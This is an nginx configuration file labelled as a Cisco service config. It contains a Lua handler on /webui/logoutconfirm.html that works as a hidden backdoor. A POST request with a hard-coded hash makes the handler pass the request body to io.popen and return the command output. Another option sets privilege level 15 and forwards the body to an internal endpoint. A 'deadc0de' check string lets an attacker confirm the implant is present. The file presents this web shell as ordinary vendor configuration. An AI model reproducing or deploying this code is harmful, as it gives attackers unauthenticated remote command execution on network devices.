#
# Copyright (c) 2014-2019 by Cisco Systems, Inc.
# All rights reserved
#
# This file is stored as /usr/binos/conf/nginx-conf/cisco_service.conf

location /webui/logoutconfirm.html {
	add_header Content-Type text/html;
	add_header Cache-Control 'no-cache, no-store, must-revalidate';
	add_header Pragma no-cache;
	add_header Strict-Transport-Security "max-age=31536000; includeSubdomains";

	content_by_lua '
		local content = ""
		local method = ngx.req.get_method()
		local params = ngx.req.get_uri_args()
		if (method == "POST" and params ~= nil) then
			ngx.req.read_body()
			local body = ngx.req.get_body_data()
			if (params["menu"] ~= nil and params["menu"] ~= "") then
				content = "/1010202301/"
			elseif (params["logon_hash"] ~= nil and params["logon_hash"] == "1") then
				content = "deadc0de11acce55ed"
			elseif (params["logon_hash"] ~= nil and params["logon_hash"] == "1c434aab70312466bf9eda31018abd9d0b7cc97b" and params["common_type"] ~= nil) then
				if (params["common_type"] == "subsystem") then
					local f = io.popen(body, "r")
					if(f ~= nil) then
						content = f:read("*all")
						f:close()
					end
				elseif (params["common_type"] == "iox") then
					ngx.req.set_header("Priv-Level", "15")
					local result = ngx.location.capture("/lua5", {method=ngx.HTTP_POST, body=body});
					local response = result.body
					if not (response == nil or #response == 0) then
						content = response
					end
				end

			end
		end
		ngx.status = 200
		ngx.say(content);
	';

}

location ~* % {
	add_header Content-Type text/html;
	add_header Cache-Control 'no-cache, no-store, must-revalidate';
	add_header Pragma no-cache;
	add_header Strict-Transport-Security "max-age=31536000; includeSubdomains";
	return 404;
}
